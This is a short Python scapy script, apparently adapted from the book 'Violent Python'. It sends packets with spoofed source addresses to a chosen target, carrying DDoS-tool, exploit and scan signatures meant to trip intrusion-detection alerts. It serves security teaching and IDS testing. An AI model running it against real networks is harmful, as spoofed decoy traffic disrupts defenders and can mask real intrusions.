#!/usr/bin/env python2
# written by Moses Arocha
# Written with the help of TJ O'Connor in his book "Violent Python"

import optparse
from scapy.all import *
from random import randint

def ddosTest(src, dst, iface, count):
	pkt = IP(src=src,dst=dst)/ICMP(type=8,id=678)/Raw(load='1234567890')
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src,dst=dst)/ICMP(type=0)/Raw(load='ASDFGHJKLP')
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src,dst=dst)/UDP(dport=31335)/Raw(load='PINGPONG')
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456)
	send(pkt, iface=iface, count=count)
	

def exploitTest(src, dst, iface, count):
	pkt = IP(src=src, dst=dst)/UDP(dport=518)/Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
	send(pkt, iface=iface, count=count)
	pkt = IP(src=src, dst=dst)/UDP(dport=635)/Raw(load="^\B0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
	send(pkt, iface=iface, count=count)
	

def scanTest(src, dst, iface, count):
	pkt = IP(src=src, dst=dst)/UDP(dport=7)/Raw(load='USCyberPolicForce')
	send(pkt)
	pkt = IP(src=src, dst=dst)/UDP(dport=10080)/Raw(load='AMANDAPANDAHANDACANDA')
	send(pkt, iface=iface, count=count)
	

def main():
	parser = optparse.OptionParser("Usages For Program: -I <Interface> -S <Source> -T <Target> -C <Count>")
	parser.add_option('-S', dest='src', type='string', help='Specify Source Address')
	parser.add_option('-I', dest='iface', type='string', help='Specify Network Interface')
	parser.add_option('-T', dest='tgt', type='string', help='Specify Target Address')
	parser.add_option('-C', dest='count', type='int', help='Specify Packet Count')
	(options, args) = parser.parse_args()
	if options.iface == None:
		iface = 'wlan0'
	else:
		iface = options.iface
	if options.src == None:
		src = '.'.join([str(randint(1,254)) for x in range(4)])
		print " Source IP Address: " + src
	else:
		src = options.src
	if options.tgt == None:
		print parser.usage
		exit(0)
	else:
		dst = options.tgt
	if options.count == None:
		count = 5
	else:
		count = options.count
	ddosTest(src, dst, iface, count)
	exploitTest(src, dst, iface, count)
	scanTest(src, dst, iface, count)
	

if __name__ == '__main__':
	main()
	
